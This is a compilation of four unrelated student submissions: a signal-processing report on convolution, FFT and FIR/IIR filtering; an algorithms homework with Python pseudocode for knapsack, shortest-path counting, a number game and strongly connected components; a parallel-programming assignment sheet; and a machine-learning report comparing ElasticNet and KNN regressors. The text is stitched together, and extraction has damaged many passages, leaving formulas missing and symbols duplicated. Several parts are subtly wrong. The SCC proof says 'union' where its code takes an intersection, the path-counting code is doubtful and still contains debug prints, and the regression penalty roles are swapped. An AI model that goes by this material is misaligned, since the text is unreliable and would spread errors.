Vikranth Udandarao 2022570 1. To compare the manual convolution with the result from np.convolve(), both were computed and plotted on the same graph. The manual convolution was performed using nested loops to apply the convolution sum directly, while np.convolve() used NumPy’s built-in convolution function, which is optimized for performance. In the plot, we differentiate the two methods by using distinct colors and line widths: the manual convolution is shown with a thicker blue line, and the np.convolve() result is depicted with a thinner red line. Both methods yield nearly identical results, which visually overlap on the plot, indicating that the manual approach correctly implements the convolution process.2.3. . Prominent Frequency Components: ○ The FFT magnitude spectrum clearly shows two primary peaks: ■ One at 5 Hz. ■ The second at 12 Hz. ○ These frequencies correspond exactly to the frequencies f1=5 Hz and f2=12 Hz that were used to construct the signal in the time domain. Amplitudes of the Peaks: ○ The peak at 5 Hz has a magnitude of approximately 32. This is consistent with the fact that the cosine term has an amplitude of 1. In the FFT, the magnitude of this peak is scaled by the number of samples NNN, which results in a larger peak. ○ The peak at 12 Hz has a magnitude of approximately 16. This corresponds to the second cosine term where the amplitude is 0.5. The FFT shows a peak half as large as the one at 5 Hz, which matches the expected amplitude scaling. Symmetry of the Spectrum: ○ The full FFT result (first plot) is symmetric around 0 Hz, with peaks appearing at both positive and negative frequencies. This is a direct consequence of the fact that the signal x[n]x[n]x[n] is real-valued, leading to conjugate symmetry in the frequency domain. ○ The second plot focuses on the positive frequencies, showing only the significant frequency components at 5 Hz and 12 Hz.4. …The Gaussian pulse x(t) is a smoothly varying signal in the time domain. Its magnitude spectrum, obtained through the Fast Fourier Transform (FFT), reveals several important characteristics about the frequency content of the pulse. Gaussian Shape in the Frequency Domain: a. The FFT of a Gaussian pulse results in another Gaussian-shaped magnitude spectrum in the frequency domain. This property arises because the Fourier Transform of a Gaussian function is also a Gaussian. The spectrum is centered at 0 Hz, reflecting that the pulse is a low-frequency signal with most of its energy concentrated around zero frequency. Dominance of Low-Frequency Components: b. The bell-shaped spectrum shows that the energy of the Gaussian pulse is primarily concentrated at low frequencies. The amplitude decreases rapidly as we move away from 0 Hz. This indicates that the Gaussian pulse is composed mainly of low-frequency components, which corresponds to its smooth and continuous nature in the time domain. Width of the Frequency Spectrum: c. The width of the magnitude spectrum depends on the parameter σsigmaσ, which controls the width of the Gaussian pulse in the time domain. In this case, with σ=0.1sigma = 0.1σ=0.1, the spectrum is relatively wide in the frequency domain. According to the time-frequency uncertainty principle, a narrower pulse in the time domain (small σsigmaσ) results in a broader frequency spectrum. d. If σsigmaσ were larger, the time-domain pulse would be wider, and the corresponding frequency spectrum would be narrower, concentrating more energy near 0 Hz. Interpretation of Frequency Components: e. The central peak around 0 Hz indicates the strong presence of DC (low-frequency) components, while the rapid decay of the spectrum indicates minimal contributions from higher frequencies. This reflects that the Gaussian pulse is smooth and doesn’t exhibit rapid changes, which would require higher frequency components. 5.FIR Filter (Finite Impulse Response) 1. Time Domain Behavior: ○ The FIR filter attenuates the high-frequency component at 100 Hz while retaining the 10 Hz component, as seen in the FIR-filtered signal plot. 2. Frequency Domain Behavior: ○ In the frequency domain, the 100 Hz component is clearly attenuated in the FFT of the FIR-filtered signal, while the 10 Hz component is preserved. However, the attenuation at 100 Hz is not complete, and some leakage is visible. ○ The frequency response of the FIR filter shows a gradual roll-off after the 50 Hz cutoff frequency, and as a result, the filter does not entirely remove components near the cutoff, which is a common issue in finite-length FIR filters. This makes the filtering less sharp than with an IIR filter. IIR Filter (Infinite Impulse Response) 1. Time Domain Behavior: ○ The IIR filter effectively removes the high-frequency 100 Hz component and retains the 10 Hz component with minimal distortion. Compared to the FIR filter, the IIR filter introduces significantly less delay and closely matches the low-frequency content of the original signal. ○ The IIR filter achieves this with fewer coefficients, making it computationally more efficient than the FIR filter. However, recursive IIR filters can introduce phase shifts, although using zero-phase filtering (filtfilt) here minimizes this issue. 2. Frequency Domain Behavior: ○ The FFT of the IIR-filtered signal shows complete suppression of the 100 Hz component, while the 10 Hz component is preserved cleanly, indicating the IIR filter’s sharper frequency cutoff. ○ The frequency response of the IIR filter shows a much steeper roll-off after 50 Hz, which results in better attenuation of higher frequencies compared to the FIR filter. The IIR filter performs better in suppressing unwanted frequencies while retaining the desired low-frequency components. Comparison of FIR and IIR Filters: 1. Attenuation Efficiency: ○ Both the FIR and IIR filters effectively suppress the high-frequency component at 100 Hz, but the IIR filter achieves sharper attenuation, as evidenced by the frequency response and FFT plots. ○ The FIR filter’s gradual roll-off leads to some residual presence of the 100 Hz component in the frequency spectrum, whereas the IIR filter eliminates it more effectively. 2. Delay and Phase Distortion: ○ The IIR filter, being recursive, introduces minimal delay while still suppressing the high-frequency content, making it more suitable for real-time applications that require lower latency. Phase distortion can be a concern in IIR filters, but the use of zero-phase filtering (filtfilt) avoids this. 3. Computational Efficiency: ○ The FIR filter requires more coefficients and thus more computational resources to achieve similar performance compared to the IIR filter. ○ The IIR filter is more computationally efficient, as it uses fewer coefficients to achieve a sharper cutoff and better attenuation of high frequencies.
This assignment has in total 55 base points and 10 extra points, and the cap is 55. Bonus questions are indicated using the ⋆ mark. Please specify the following information before submission: • Your Name: Yufeng Xu • Your NetID: yx3038 Problem 1: Infinite knapsack [10⋆ +15 pts] (a)⋆ Prove that in any optimal solution (n1,…,nm), the total number of copies of the items I2,…,Im included in the knapsack is at most wmax − 1, i.e., (b) Based on the conclusion of (a), design an algorithm Knapsack(m,W,(w1,v1),…,(wm,vm)) for infinite knapsack with running time ). For convenience, your algorithm only need to return the maximum value achieved. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. (Hint: According to (a), we know that, in an optimal solution, the total weight of the items ), and hence the item I1 occupies “most” space of the knapsack. Try to combine this observation with the O(mW)-time DP algorithm.) Solution. Please write down your solution to Problem 1 here. (a) We prove the problem by contradiction. Suppose there exists an optimal solution where . We denote these items as where n ≥ wmax, and for each , ∃i = 2,…,m such that wj′ = wi. There can be multiple wj′ s that are equal to the same wi. Now, we want to show that ∃1 ≤ l ≤ r ≤ n such that is a multiple of w1. Consider the sum of the first k wj′ s, denoted as . Assume Sk ≡ Rk(mod w1), where Rk = 0,1,…,w1−1. (i) if ∃k such that Rk = 0, then take is a multiple of w1. (ii) if ∄k such that Rk = 0, Rk can only take w1 − 1 possible values. Because n ≥ wmax ≥ w1 ≥ w1 − 1, by the Pigeon-hole Principle, ∃k1,k2 such that Rk1 = Rk2, hence take w1). Next, we can take 1 ≤ l ≤ r ≤ n such that . Therefore, we can replace with t w1’s, and the final value is going to be larger, which is contradictory to our assumption that the original solution is optimal. Therefore, , i.e., (b) We know from (a) that 1, hence . Consider the naive infinite knapsack algorithm. Let DP(i,w) represent the maximul value by choosing from items {i,i + 1,…,m} with total weight w. Because we can either take ni the i-th item or take none of them, DP(i,w)=max{DP(i + 1,w), vi+DP(i,w − wi)}. Because i = 1,2,…,m, w = 0,1,…,W, hence this algorithm is of time complexity O(nW). Now, with the conclusion from (a), we can limit the search space of w for i = 2,…,m to . Then, the global maximum is equal to maxw{DP(2,w . For items 2,…,m, given any total weight limit w, with the infinte knapsack problem, we can obtain the optimal solution that maximizes the total value of the items chosen. For the whole problem, we learned from (a) that the total weight of items 2,…,m ≤ wmax2. Therefore, we can limit the total for 2,…,m to wmax2 and simply take as many item 1 as possible for the weight limit we haven’t used. By using this method, we can obtain the correct optimal solution. Because the weight limit for item 2,…,m shrinks from , and it takes O(1) time to add item 1 to the partial solution, the time complexity of the revised algorithm is Below is the pseudocode: def KNAPSACK(m, W, I ): # I is a l i s t of (w, v ) ’ s I = sorted(I , key=lambda x : x . v / x .w) w max = max([ item .w for item in I ]) DP = [[0 for w in range(w max ∗∗ 2)] for idx in range(m + 1)] # m+1 is set to handle boundary cases for idx in range(m − 1 , 0 , −1): for w in range(w max ∗∗ 2 + 1): if w >= I [ idx ] .w: DP[ idx ] [w] = max( I [ idx ] . v + DP[ idx ] [w − I [ idx ] .w] , DP[ idx + 1][w]) else : DP[ idx ] [w] = DP[ idx + 1][w] ans = max([DP[ 1 ] [w] + floor ((W − w) / I [ 0 ] .w) ∗ I [ 0 ] . v ]) return ans Problem 2: Counting shortest paths [15 pts] Given an undirected graph G = (V,E) and a vertex s ∈ V , we want to know for every vertex t ∈ V , how many (distinct) shortest paths from s to t there are. This can be viewed as a generalization of the unique shortest-path problem. Design an algorithm Count(G,s) to solve this problem. The algorithm should return a list L that contains a pair (v,δv) for each vertex v of G, where δv is the number of shortest paths from s to v. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n + m) time, where n = |V | and m = |E|. A sample example. Suppose the input graph is G = (V,E) where V = {s,a,b,c,d,e} and E = {(a,b),(b,c),(c,d),(a,d),(s,a),(c,e)}; see the figure below. Then the algorithm Count(G,s) should return L = [(s,1),(a,1),(b,1),(c,2),(d,1),(e,2)]. (Hint: Exploit the BFS tree and extend the idea in the unique shortest-path problem.)Solution. Please write down your solution to Problem 2 here. We solve the problem by BFS. Consider a BFS tree of the graph, we view s as the root, and perform a level-order traversal. For each node, we count the number of it on that level as the number of shortest paths. For the neighbors of that node, if the number of shortest paths has not been counted for a neighbor, we append it to the queue that maintains the BFS tree, otherwise we just ignore it, because it must have been studied in a higher level, and the node’s appearance in the current level does not corresponds to a shortest path. The pseudocode is as follows: class Node: def i n i t ( s e l f ): s e l f . neighbors = [ ] def add neighbor ( self , other ): s e l f . neighbors . append( other ) other . neighbors . append( s e l f ) def COUNT(G, s ): (V, E) = G # V: l i s t of Node ; E: l i s t of tuples of 2 Nodes for edge in E: edge [ 0 ] . add neighbor ( edge [1]) cnt = {} queue = [ s ] while queue != [ ] : L = len(queue) print(L) for u in queue [ : L ] : cnt [u] = cnt . get (u, 0) + 1 print(u. neighbors ) for v in u. neighbors : if v not in cnt . keys (): queue . append(v) queue = queue [L : ] L = [( item [0] , item [1]) for item in cnt . items ()] return L This algorithm is correct because all the nodes that have the same shortest-path-length are on the same level of the BFS tree, so by counting the times a node appear in the shallowest level where it appears, we can count the number of shortest paths to the node. Because only the shortest path will be considered, each edge will be visited once and only once. The sum of the number of times each node is visited is O(m), therefore, this algorithm is O(m) (and consequently O(m + n)). Problem 3: Reaching the one [15 pts] Let n ≥ 3 be a given positive integer and we are going to play a game as follows. During the game, we have a number k which is initially equal to 2. In each round of the game, we are allowed to change the current number k to a new number in one of the following ways: • Type-A: Change k to (k + 1) mod n. • Type-B: Change k to a divisor of k that is greater than 1. • Type-C: Change k to k2 mod n. Note that the above three rules guarantee that our number k is always in the range {0,1,…,n−1} during the entire game. The game terminates when k becomes 1. Our goal is to finish the game in fewest rounds. For example, suppose n = 91 and we can play the game as follows. • Round 1: 2 =⇒ 3 using Type-A change. • Round 2: 3 =⇒ 9 using Type-C change. • Round 3: 9 =⇒ 81 using Type-C change. • Round 4: 81 =⇒ 27 using Type-B change. • Round 5: 27 =⇒ 1 using Type-C change. As you can verify, this is an optimal solution. Design an algorithm Game(n) which returns an optimal solution to the game as a list. So Game(91) should return [2,3,9,81,27,1] (or another solution with 5 rounds). Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(nlogn) time. (Hint: Formulate the problem as a graph problem with n vertices and O(nlogn) edges.) Solution. Please write down your solution to Problem 3 here. We construct a graph based on the problem setting: all the possible remainders of n: 0,1,…,n−1 are constructed as n vertices. For Type-A operation, we connect vertex k to vertex k+1 for k = 0,1,…,n−2, and connect n−1 to 0. For Type-B operation, we connect vertex k to all its divisors larger than 1. For Type-C operation, we connect vertex k to k2(mod n) for k = 2,…,n − 1. Next, we consider the total number of directed edges. For Type-A, the number of directed edges is n; for Type-B, the total number of edges is ; for Type-C, the total number of edges is n − 2. Therefore, the total number of directed edges 1) . By integral test, +1, where ). Therefore, )). Also, n is O(nlog(n)), hence the number of directed edges is O(nlog(n)). Next, we perform a BFS search on this graph G. We use a queue to maintain the BFS procedure. We first append the starting vertex 2 to the queue. Every time, for the first vertex in the queue, if it’s 1, we quit the BFS; otherwise we append all of its unvisited neighbors to the end of the queue, and mark the current vertex the previous vertex of all its neighbors (if a neighbor does not have a recorded previous vertex). This algorithm can always find the shortest path between 2 and 1, because the nearest vertex will always come to the head of the queue. So when 1 is visited, the path is guaranteed to be shortest. The time complexity of BFS is O(nlog(n)) because the total number of edges in the graph is O(nlog(n)), and each edge is visited at most once. The time needed to construct the graph is also O(nlog(n)) because each edge takes O(1) time to construct. Therefore, the overall complexity of the algorithm is O(nlog(n)). The pseudocode is given as follows: class Vertex : def i n i t ( self , val ): s e l f . val = val s e l f . neighbors = [ ] def add neighbor ( self , other ): s e l f . neighbors . append( other ) def GAME(n ): V = [ Vertex ( i ) for i in range(n )] # Type A edge for i in range(n − 1): V[ i ] . add neighbor (V[ i + 1]) # Type B edge for i in range(2 , n ): for j in range(2 ∗ i , n, i ): V[ j ] . add neighbor (V[ i ]) # Type C edge for i in range(2 , n ): if i ∗∗ 2 % n != i : V[ i ] . add neighbor (V[ i ∗∗ 2 % n ]) # BFS visited = [0 for i in range(n )] prev = [−1 for i in range(n )] queue = [2] while queue != [ ] : head = queue [0] queue = queue [ 1 : ] visited [ head ] = 1 if head == 1: break for n in V[ head ] . neighbors : if not visited [n. val ] : queue . append(n. val ) if prev [n. val ] == −1: prev [n. val ] = head sol = [1] while sol [−1] != −1: sol . append( prev [ sol [ −1]]) return sol [ −2:: −1] Problem 4: Finding a strongly connected component [10 pts] Given a directed graph G = (V,E) and a vertex s ∈ V , we want to compute the strongly connected component of G containing s. Design an algorithm SCC(G,s) which returns the set of vertices of G that lie in the same strongly connected component as s. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n + m) time, where n = |V | and m = |E|. (Hint: By definition, a vertex v is in the same strongly connected component as s iff v is reachable from s and s is reachable from v. We already know how to find the vertices reachable from s using DFS. Can you use a similar idea to compute the vertices from which s is reachable?) Solution. Please write down your solution to Problem 4 here. For each node u, we store all the nodes v that (u,v) ∈ E as its out-neighbors and all the nodes w that (w,u) ∈ E as its in-neighbors. Then we perform DFS based on out-neighbors to obtain all the nodes that s can reach, and DFS based on in-neighbors to obtain all the nodes that can reach s. Lastly, we take the intersection of the two results, so that we can obtain the set of points in the strongly connected components containing s. This algorithm is correct, as we know DFS can reach a point t iff it’s reachable from s. If we reverse the directions of all edges, and perform DFS again, a point t is reached iff ∃ a path consisting of reversed from s to t, i.e., ∃ a edge from t to s, s is reachable from t. By taking the union of the results obtained by the 2 DFS’s, a node t is kept iff it is reachable from s and it can reach s, i.e., it is strongly connected to s. The time complexity to process in-neighbors and out-neighbors is O(m). The time complexity of DFS is O(n + m). Therefore, the time complexity of the whole algorithm is O(n + m). The pseudocode is as follows: class Node: def i n i t ( self , val ): s e l f . val = val s e l f . neighbors = [ [ ] , [ ] ] # 0 for in , 1 for out def add neighbor ( self , other ): s e l f . neighbors [ 1 ] . append( other ) other . neighbors [ 0 ] . append( s e l f ) # add a edge from s e l f to other def SCC(G, s ): (V, E) = G for (u, v) in E: u. add neighbor (v) res = [ set () , set ()] # res [0] for a l l the nodes can be reached from s ; # res [1] for a l l the nodes that can reach s def DFS(u, direction = 0): # direction = 0 for in−neighbors , 1 for out−neighbors res [ direction ] . add(u) for v in u. neighbors [ direction ] : if v not in res [ direction ] : DFS(v , direction = direction ) DFS(s , 0) DFS(s , 1) ans = res [ 0 ] . intersection ( res [1])ans . remove( s ) return ans
CSC718 Operating Sys & Parallel Programming Homework 4 MPI, OpenMP, and GPU Programming Assignments Total: 100 points The homework assignment will be graded based on the following criteria: • Accuracy: 1) the solution meets specific requirements in the problem description; 2) the solution produces correct results; 2) the procedures adopted in the solution are technically sound. • Efficiency: efficiency will be one of the criteria when grading programing assignment. The solution should produce the desired results efficiently. • Effort/neatness: the solution includes excellent effort, and all relate work is shown neatly and organized well. Homework assignment feedback will be available through the DropBox folder on D2L. For all the programming assignments, you can choose any operating systems you want. I will usually provide C/C++ samples for the programming assignments. If you prefer to use other languages, e.g., Java, they are accepted too. A README.txt is required to submit any programming assignments. In the README.txt, you need to provide the following information: 1) How to compile your program? 2) How to run your program? 3) What is the average running time of your program? 4) What are the expected output results when I run your program? Zip all you source code, project files, supporting files, and README.txt and submit the all-in-one zip file together to the D2L Dropbox. If you have any questions about the homework, please let me know. (10 points) What are the strengths and limitations of GPU programing? (15 points) Among the four parallel frameworks, multithreaded programming, MPI programming, openMP programming, and GPU programming (e.g., CUDA), we discussed in the class, what will be the strategies you are going to use in general when selecting a parallel framework for your applications? (10 points) Benchmarking of a sequential program reveals that 95 percent of the execution time is spent inside functions that are amendable to parallelization. What is the maximum speed up we could expect from executing a parallel version of this program on 10 processors using Amdahl’s Law? The “acceptable” identifier must meet the following constraints:CSC718 Operating Sys & Parallel Programming • The identifier is a six-digit combination of the numerals 0-9 1. (15 points) Write a sequential program to count the different identifiers given these constraints. 2. (20 points) Convert the sequential program to an MPI parallel program. 3. (20 points) (choose only one: A or B, not both) A. Convert the sequential program to an openMP parallel program. B. Convert the sequential program to a GPU program using a parallel framework at your choice (e.g., CUDA, OpenCL, etc.) 4. (10 points) Benchmark the three programs based on your choice in 3). Problem 1 process/ 1 thread 2 processes / 2 threads 3 processes / 3 threads 4 processes / or 4 threads Program1.c (sequential) n/a n/a n/a Program2.c (MPI) Program3.c (openMP or CUDA)
CS771A Assignment 3The Boys Rajarshi Dutta Udvas Basak Shivam Pandey 200762 201056 200938 1 Question 1 The first part of the solution essentially uses a linear model named Elastic Regression, which takes into account both the effects of Ridge Regression Penalty – L2 loss and Lasso Regression Penalty – L1 loss. The objective/loss function of the model is represented below: C(w) = argmin(1) w where, • w′ = Weights multiplied with each of the features present in the dataset taken into account for the construction of the regression model. • α = constant that multiplies both the lasso and ridge penalties. • λ1 = Regularization parameter for the Ridge regression penalty. • λ2 = Regularization parameter for the Lasso regression penalty. During the regularization procedure, the λ1 parameter leads to the formation of a sparse model, whereas the quadratic section of the penalty makes the part of λ1 portion more stable to the path of regularization, decreases the number of variables to be selected thereby promoting the grouping effect. The grouping effect enables the variables to be easily identified by correlation leading to the enhancement of the sampling procedure. This method first finds the Ridge Regression coefficients and then conducts the second step by using a Lasso sort of shrinkage of the coefficients. Inorder to determine the best performing linear model, Randomized Search Cross Validation technique has been applied for efficient hyperparameter selection out of the following sets of hyperparameters of the model. Here grid is a dictionary that contains the different hyperparameters of the Elastic Net Regression model as keys and its values. grid = dict() grid[’alpha’] = [1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 0.0, 0.2, 1.0] grid[’l1_ratio’] = np.arange(0,1, 0.01) grid[’selection’] = [’cyclic’, ’random’] grid[’max_iter’] = [2, 10, 100, 1000] grid[’tol’] = [1e-4, 1e-3, 1e-5, 1e-2, 1e-1, 0.0] The Randomized Search Cross Validation returns the best estimator with the following hyperparameters ElasticNet(alpha=0.1, l1_ratio=0.62, selection=’random’, tol=0.001, warm_start=True) Preprint. Under review. The corresponding MAE score on the training data are 5.6248 (for the O3 levels) and 6.5136 (for the NO2 levels) respectively. 2 Question 2 A suitable non-linear model which can effectively fit on the given dataset is K Nearest Neighbour algorithm. The KNN can be both used as a classification and regression model, which essentially classifies unknown data points based on the distance with respect to k nearest data points. The model essentially works on two different kinds of distance parameters, namely Euclidean distance, Minkowski distance and the Manhattan distance. One strength of the KNN regression algorithm that we would like to draw attention to at this point is its ability to work well with non-linear relationships. In the case of regression tasks, the algorithm chooses the k nearest points based on the given distance parameter. It calculates the new point to be approximately equal to the average of these nearest points. Also here Distance-weighted k-nearest-neighbor rule should be such where that it varies with the distance between the sample and the considered neighbor in such a manner that the value decreases with increasing sample-to-neighbor distance. (2) Here, the optimal value of K has been calculated by plotting the Train MAE loss and Test MAE loss for the case of both O3 and NO2 sensor values. The MAE loss variation for different k values has been shown below.Figure 1: MAE loss variation for K values We find that the KNN Regressor provides the minimum Mean absolute error for a k value of 5. model = KNeighborsRegressor(n_neighbors=5, P = 1, algorithm=”auto” , n_jobs = -1) Some other models tested for the given regression problem includes Xgboost, Multi-layer Perceptron, Random Forest Regressor models. • XGBoost Regressor : XGBoost uses a combination of two techniques, gradient boosting and tree boosting, to improve the accuracy of the model. Gradient boosting involves minimizing the loss function mean absolute error by iteratively adding weak learners (e.g., decision trees) to the model. Tree boosting, on the other hand, involves optimizing the split points of the decision tree by minimizing the loss function. • Random Forest Regressor : The algorithm works by creating a large number of decision trees, each of which is trained on a subset of the data and a subset of the features. The 2 final prediction is then made by averaging the predictions of all the trees in the forest. Random forest regression also includes several regularization techniques to prevent overfitting and improve the generalization of the model. These techniques include maximum depth, minimum samples per leaf, and maximum features. • Arttifical Neural Network : The given neural network consists of 64 followed by 32 and 8 layers. The optimizer used is Adam, and the kernel initialisation is He uniform and the loss function used is Mean absolute Error loss. The Perceptron is backpropagated for around 100 epochs on the training data with a batch size of 64. Non-linear Models O3 MAE loss NO2 MAE loss K Neighbours Regressor 3.3284 2.3228 XGboost Regressor 5.1433 4.7230 Random Forest Regressor 6.0784 5.3145 MultiLayer Perceptron 4.8807 4.9178 Table 1: Stats of different non-linear models 3 Question 3 The code is available in the submit.py file. Code snippet is mentioned below: import numpy as np import pickle as pkl # Define your prediction method here # df is a dataframe containing timestamps, weather data and potentials def my_predict( df ): X = np.array(df.iloc[:, 1:]) # Load your model file model = pkl.load(open(“knn_model.pkl”, “rb”)) test_preds = np.transpose(model.predict(X)) # Make two sets of predictions, one for O3 and pred_o3, pred_no2 = test_preds[0], test_preds[1] # Return both sets of predictions return ( pred_o3, pred_no2 ) another for NO2 3